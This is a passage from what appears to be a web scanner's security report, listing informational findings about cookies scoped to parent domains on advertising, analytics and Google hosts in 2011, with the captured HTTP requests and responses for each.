__qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:11 GMT
Server: Apache
Set-Cookie: UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; expires=Thu, 03-Nov-2011 15:54:34 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; expires=Thu, 05-May-2011 13:00:11 GMT; path=/; domain=.huffingtonpost.com
Cache-Control: max-age=0
Expires: Thu, 05 May 2011 01:00:11 GMT
Content-Length: 42
Content-Type: image/gif

GIF89a.............!.......,...........D.;

16.41. http://b.mmafighting.com/vanity/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.mmafighting.com
Path:   /vanity/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /vanity/?ts=1304575045039&h=www.mmafighting.com&v=10&t=Former%20NHL%20Enforcer%20Donald%20Brashear%20to%20Fight%20at%20Ringside%20MMA%2011%20--%20MMA%20Fighting&r=&l=0&k=1&ms=501&domain=sports&subdomain=mmafighting&platform=bs&dL_ch=us.mmafight&dL_dpt=spr%20%3A%20MMA&dL_sDpt=spr%20%3A%20Article&dL_cmsID=bsd%3A19931900&UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.c9aa HTTP/1.1
Host: b.mmafighting.com
Proxy-Connection: keep-alive
Referer: http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:33 GMT
Server: Apache
Set-Cookie: UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.c9aa; expires=Thu, 03-Nov-2011 15:51:56 GMT; path=/; domain=.mmafighting.com
Set-Cookie: CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.c9aa; expires=Thu, 05-May-2011 12:57:33 GMT; path=/; domain=.mmafighting.com
Cache-Control: max-age=0
Expires: Thu, 05 May 2011 00:57:33 GMT
Content-Length: 42
Content-Type: image/gif

GIF89a.............!.......,...........D.;

16.42. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?rn=93511347&C1=2&C2=1000009&C4=http%3A%2F%2Fwww.aol.com%2F&C5=us.aolportal&C7=http%3A%2F%2Fwww.aol.com%2F&C8=AOL.com%20-%20News%2C%20Sports%2C%20Weather%2C%20Entertainment%2C%20Local%20%26%20Lifestyle HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 204 No Content
Content-Length: 0
Pragma: no-cache
Date: Thu, 05 May 2011 00:56:23 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Sat, 04-May-2013 00:56:23 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


16.43. http://b.scorecardresearch.com/p

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=3&c2=6034986&c3=UMAA-UMA-095-33-MRT&c4=STND_MFESRP_FY11H2_BR_CusSrch_1x1&c5=284115772&c6=&cj=1&rn=58195579331368210 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Thu, 05 May 2011 01:00:36 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Sat, 04-May-2013 01:00:36 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

16.44. http://b.scorecardresearch.com/r

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6035805&d.c=gif&d.o=spnprod&d.x=52797902&d.t=page&d.u=http%3A%2F%2Faol.sportingnews.com%2Fnfl%2Fstory%2F2011-05-04%2Fathletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec1_lnk3%257C60545 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?icid=maing-grid7%7Cmain5%7Cdl4%7Csec1_lnk3%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Thu, 05 May 2011 00:57:52 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Sat, 04-May-2013 00:57:52 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

16.45. http://b.voicefive.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=4&c2=p97174789&c3=253735228&c4=178115060&c5=1&c6=34&c7=sun%20apr%2024%2012%3A09%3A48%202011&c8=http%3A%2F%2Fmusic.aol.com%2F_uac%2Fadpage.html&c9=&c10=http%3A%2F%2Fmusic.aol.com%2Fradioguide%2Fbb&c15=&1304575017593 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; UID=875e3f1e-184.84.247.65-1303349046; ar_p97174789=exp=34&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 5 00:56:58 2011&prad=253735228&arc=178115060&; BMX_G=method->-1,ts->1304557018; BMX_3PC=1

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Thu, 05 May 2011 00:56:59 GMT
Connection: close
Set-Cookie: UID=875e3f1e-184.84.247.65-1303349046; expires=Sat, 04-May-2013 00:56:59 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


16.46. http://bid.openx.net/json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bid.openx.net
Path:   /json

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /json?c=OXM_27407467597&pid=c7be9c39-b00b-4e4a-9ba7-a7008d2ad56b&s=300x250&f=1.19&cid=&url=http%3A%2F%2Fwww.huffingtonpost.com%2F%3Ficid%3Dnavbar_huffpo_main5 HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=02dd71c0-6aac-4019-82e3-049e51d96c25

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: s=c6c7c20e-c3b2-426b-ab0c-ecdc9669188d; version=1; path=/; domain=.openx.net;
Set-Cookie: p=1304557170; version=1; path=/; domain=.openx.net; max-age=63072000;

OXM_27407467597({"r":"\u003cdiv style\u003d\"position: absolute; width: 0px; height: 0px; overflow: hidden\"\u003e\u003cimg src\u003d\"http://bid.openx.net/log?l\u003dH4sIAAAAAAAAAGXQu07DMBQG4D9pk7pxo
...[SNIP]...

16.47. http://blogsearch.google.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogsearch.google.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: blogsearch.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:52:43 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=66f43664986180c9:TM=1304592763:LM=1304592763:S=sW2wguO7dQkK_rw8; expires=Sat, 04-May-2013 10:52:43 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: bsfe
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta HTTP-EQUIV="content-type" content="text/html; charset=UTF-8"><meta description="Google Blog Search provides fresh, relevant search results from millions of feed-enabled blogs. Users
...[SNIP]...

16.48. http://books.google.com/bkshp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://books.google.com
Path:   /bkshp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bkshp HTTP/1.1
Host: books.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:52:43 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=c1d7b38e1628288e:TM=1304592763:LM=1304592763:S=6Y9aNBav9Lheselb; expires=Sat, 04-May-2013 10:52:43 GMT; path=/; domain=.google.com
Set-Cookie: NID=46=YOcf_JLU_JBMBBzye7DnIORhv7UNGEFY-HO8-JIyoncdmZhpT1oTlXnZS8gUGVXemremLPEtoWl6Wi3g9z2rL-GyE1-8sLO8aAzp6I9CGRNv8bSqFTj280CvMy0XDZ2x; expires=Fri, 04-Nov-2011 10:52:43 GMT; path=/; domain=.google.com; HttpOnly
X-Content-Type-Options: nosniff
Server: OFE/0.1
Connection: close

<!DOCTYPE html><html><head><script>(function(){function a(c){this.t={};this.tick=function(c,e,b){b=b!=void 0?b:(new Date).getTime();this.t[c]=[b,e]};this.tick("start",null,c)}var d=new a;window.jstimi
...[SNIP]...

16.49. http://books.google.com/books

Summary

Severity:   Information
Confidence:   Certain
Host:   http://books.google.com
Path:   /books

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /books HTTP/1.1
Host: books.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:52:43 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=db8ca40d82c23353:TM=1304592763:LM=1304592763:S=FY0-wvBYSE_o2B0V; expires=Sat, 04-May-2013 10:52:43 GMT; path=/; domain=.google.com
Set-Cookie: NID=46=XblbW1BMLx5n-e6-TrHwaY-mpnyy00_HXQ0ReKuAFkkyQjoNXAO5Bf2SFk4C96cEMmh-nbxnFdV9NM7mcyFOVCBI-4fb1JH6LJ5fvTBkvjpupvas6MpcqsovYwRUUn1v; expires=Fri, 04-Nov-2011 10:52:43 GMT; path=/; domain=.google.com; HttpOnly
X-Content-Type-Options: nosniff
Server: OFE/0.1
Connection: close

<!DOCTYPE html><html><head><script>(function(){function a(c){this.t={};this.tick=function(c,e,b){b=b!=void 0?b:(new Date).getTime();this.t[c]=[b,e]};this.tick("start",null,c)}var d=new a;window.jstimi
...[SNIP]...

16.50. http://bs.serving-sys.com/BurstingPipe/adServer.bs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2335841&PluID=0&w=300&h=250&ord=599147281&cs=1&ncu=$$http://at.atwola.com/adlink/5113/675309/0/170/AdId=1579608;BnId=6;itime=599147281;kvpg=mobile%2Eaol%2Fproduct%2Fiphone%2Faim;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312;kvmn=93241795;kvtid=16r4opq1tvlkml;kr2703=77796;kvseg=99999:51134:50086:50085:53380:60490:60512:50963:52615:60491:50507:53656:55401:60509:57094:50961:52841:51182:56419:54032:51186:56988:56673:56148:57362:56969:60203:56835:56987:56780:50220;kp=35423;nodecode=yes;link=$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/product/iPhone/aim/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ebNewBandWidth_.bs.serving-sys.com=131%3A1303947429371; eyeblaster=BWVal=737&BWDate=40663.344456&debuglevel=&FLV=10.2154&RES=128&WMPV=0; TargetingInfo=0007g420000%5f; C4=; A3=jlP8aJjE0dpH00001jBofaIOs07Si00001; B3=9wtb0000000001ur9oDg0000000001ut; u2=eabf95f8-0142-429e-b9ac-2012a75d64353HU0ag

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=jlP8aJjE0dpH00001jAsGaJH702WG00001jBofaIOs07Si00001; expires=Wed, 03-Aug-2011 08:39:08 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=8Whx0000000001uu9wtb0000000001ur9oDg0000000001ut; expires=Wed, 03-Aug-2011 08:39:08 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 05 May 2011 12:39:07 GMT
Connection: close
Content-Length: 3646

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

16.51. http://bs.serving-sys.com/BurstingPipe/adServer.bs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=5130026~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~261~0~01020^ebAboveTheFoldDuration~261~0~01020&OptOut=0&ebRandom=0.19715182739309967&flv=10.2154&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/product/iPhone/aim/
Origin: http://mobile.aol.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=97f764ad-fb75-4e5f-b869-79e1ca30994b3HX060; expires=Wed, 03-Aug-2011 08:43:33 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=FLV=10.2154&RES=128&WMPV=0; expires=Wed, 03-Aug-2011 08:43:33 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 05 May 2011 12:43:33 GMT
Connection: close
Content-Length: 0


16.52. http://cdn4.eyewonder.com/cm/js/10295-119241-2568-4

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn4.eyewonder.com
Path:   /cm/js/10295-119241-2568-4

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cm/js/10295-119241-2568-4?mpt=599154609&mpvc=http://at.atwola.com/adlink/5113/675309/0/170/AdId=1360646;BnId=6;itime=599154609;kvpg=mobile%2Eaol%2Fproduct%2Fiphone%2Fdaily%2Dfinance;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312;kvmn=93241795;kvtid=16r4opq1tvlkml;kr2703=77796;kvseg=99999:51134:50086:50085:53380:60490:60512:50963:52615:60491:50507:53656:55401:60509:57094:50961:52841:51182:56419:54032:51186:56988:56673:56148:57362:56969:60203:56835:56987:56780:50220;kp=92038;nodecode=yes;link= HTTP/1.1
Host: cdn4.eyewonder.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/product/iPhone/daily-finance/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=46431933753; mojo3=17671:21707

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=10295:2568/17671:21707; expires=Sun, 5-May-2013 5:51:54 GMT; path=/; domain=.eyewonder.com;
Location: http://cdn4.eyewonder.com/content/0/10295/119241/AOL-300-250-ATM_COVERAGE_300x250_v1_r1-Banner-1420653.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F10295-119241-2568-4%3Fmpt%3D599154609&mpt=599154609&mpvc=http://at.atwola.com/adlink/5113/675309/0/170/AdId=1360646;BnId=6;itime=599154609;kvpg=mobile%2Eaol%2Fproduct%2Fiphone%2Fdaily%2Dfinance;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312;kvmn=93241795;kvtid=16r4opq1tvlkml;kr2703=77796;kvseg=99999:51134:50086:50085:53380:60490:60512:50963:52615:60491:50507:53656:55401:60509:57094:50961:52841:51182:56419:54032:51186:56988:56673:56148:57362:56969:60203:56835:56987:56780:50220;kp=92038;nodecode=yes;link=
Content-Length: 0
Date: Thu, 05 May 2011 12:39:16 GMT


16.53. http://clk.atdmt.com/CNT/go/319709115/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /CNT/go/319709115/direct

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /CNT/go/319709115/direct HTTP/1.1
Host: clk.atdmt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.att.com/?1
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001304592769-11855191; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: MUID=B8ED1941DD884FED9A24AB3498C6A8DE; expires=Monday, 21-Nov-2011 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach00=6cb8/1a43a; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach01=39505b4/1a43a/130e5fbb/6cb8/4dc28181; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Thu, 05 May 2011 10:52:49 GMT
Connection: close


16.54. http://clk.atdmt.com/M0N/go/314366790/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /M0N/go/314366790/direct

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /M0N/go/314366790/direct HTTP/1.1
Host: clk.atdmt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.sprint.com
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001304592769-11855641; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: MUID=648C412C60BB42EFB8DECE8E8F07417F; expires=Monday, 21-Nov-2011 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach00=c42d/26fc; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach01=88df6e/26fc/12bcdb46/c42d/4dc28181; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Thu, 05 May 2011 10:52:49 GMT
Connection: close


16.55. http://clk.atdmt.com/NYC/go/310177527/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /NYC/go/310177527/direct

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /NYC/go/310177527/direct HTTP/1.1
Host: clk.atdmt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.citi.com/domain/home.htm
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001304592768-11854052; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: MUID=42F7F126ED3140AD9B0D5AF345CAE7D6; expires=Monday, 21-Nov-2011 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach00=c054/278e5; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach01=b08aeb9/278e5/127ceef7/c054/4dc28180; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Thu, 05 May 2011 10:52:48 GMT
Connection: close


16.56. http://clk.atdmt.com/go/253735206/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /go/253735206/direct

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /go/253735206/direct HTTP/1.1
Host: clk.atdmt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.lifelock.com/default.aspx
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001304592768-11853302; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: MUID=C34B820C4B674082B1D6B2C3875DF9F7; expires=Monday, 21-Nov-2011 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach00=e848/120af; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach01=772a248/120af/f1fb126/e848/4dc28180; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Thu, 05 May 2011 10:52:47 GMT
Connection: close


16.57. http://clk.atdmt.com/go/253735225/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /go/253735225/direct

